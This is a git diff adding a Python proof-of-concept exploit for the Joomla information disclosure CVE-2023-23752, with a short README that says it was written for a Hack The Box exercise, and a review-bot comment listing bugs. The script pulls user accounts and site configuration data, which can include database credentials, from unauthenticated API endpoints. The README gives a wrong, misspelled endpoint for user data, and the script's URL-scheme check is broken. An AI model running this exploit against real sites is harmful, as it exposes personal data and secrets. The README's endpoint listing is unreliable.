diff --git a/CVE-2023-23752.py b/CVE-2023-23752.py
new file mode 100644
index 0000000..bef468d
--- /dev/null
+++ b/CVE-2023-23752.py
@@ -0,0 +1,76 @@
+import requests
+import json
+import argparse
+
+class User:
+ def __init__(user, name, email, lastvisitDate, groupNames):
+ user.name = name
+ user.email = email
+ user.lastvisitDate = lastvisitDate
+ user.groupNames = groupNames
+
+ def __str__(user):
+ return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"
+
+def vulnCheck(tgt):
+ verUrl = tgt + "/administrator/manifests/files/joomla.xml"
+ verData = requests.get(verUrl)
+ if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
+ print("[-] Site does not appear to be vulnerable!")
+ raise SystemExit
+
+def getUsers(tgt):
+ usrUrl = tgt + "/api/index.php/v1/users?public=true"
+ usrData = requests.get(usrUrl)
+ if "404" in usrData.text.lower() or "403" in usrData.text.lower():
+ print("[-] Error fetching user data, site may not be vulnerable")
+ raise SystemExit
+ parsedUsrs = json.loads(usrData.text)
+ return parsedUsrs
+
+def parseUsers(usrData):
+ users = []
+ for user in usrData["data"]:
+ userAtribs = user["attributes"]
+ newUser = User(userAtribs["username"],
+ userAtribs["email"],
+ userAtribs["lastvisitDate"],
+ userAtribs["group_names"] )
+ users.append(newUser)
+ return users
+
+def getConfig(tgt):
+ cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
+ cfgData = requests.get(cfgUrl)
+ if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
+ print("[-] Error fetching user data, site may not be vulnerable")
+ raise SystemExit
+ parsedCfg = json.loads(cfgData.text)
+ return parsedCfg
+
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
+ parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
+ args = parser.parse_args()
+
+ tgt = args.target.lower()
+
+ if tgt[4] != "http" and tgt[5] != "https":
+ print("[*] No URL schema specified, defaulting to HTTP")
+ tgt = "http://" + tgt
+
+ vulnCheck(tgt)
+
+ print(f"\n[+] User data found!")
+ print("----------")
+ for user in parseUsers(getUsers(tgt)):
+ print(user)
+ print("----------")
+
+ print(f"\n[+] Config data found!")
+ print("----------")
+ for i in getConfig(tgt)["data"]:
+ print(i["attributes"])
+
diff --git a/README.md b/README.md
index 3a7076a..616162e 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,27 @@
-# CVE-2023-23752 - CVE-2023-23752 - Joomla Information Disclosure Vulnerability
+# CVE-2023-23752 - Joomla Information Disclosure
+
+Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
+
+I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
+
+---
+This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
+
+#### User Info
+
+`/api/index.php/v1/config/applicaton?public=true`
+
+#### Config Info
+
+`/api/index.php/v1/config/application?public=true"`
+
+## Usage
+`python3 CVE-2023-23752.py -t `
+
+---
+
+
+# License
+GPL v3.0 - as all good software should be
+
+Remember - don't be a skid :)
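Review bot: The scheme check `if tgt[4] != "http" and tgt[5] != "https":` in the `__main__` block of CVE-2023-23752.py compares single characters against whole words, so both conditions are always true and `http://` is prepended even when the target already carries a scheme (an `https://` target becomes `http://https://...`); it also raises IndexError for a target shorter than six characters. The intended test is `if not tgt.startswith(("http://", "https://")):`. Separately, none of the `requests.get` calls in vulnCheck, getUsers and getConfig pass a `timeout=`, so an unresponsive host hangs the script indefinitely, and detecting failures by searching for "404"/"403" in the response body will misfire on any page that happens to contain those digits — `resp.status_code` (or `resp.raise_for_status()`) is the reliable signal. `json.loads(...)` on a non-JSON body likewise escapes as an uncaught JSONDecodeError instead of the explanatory message the other error branches print.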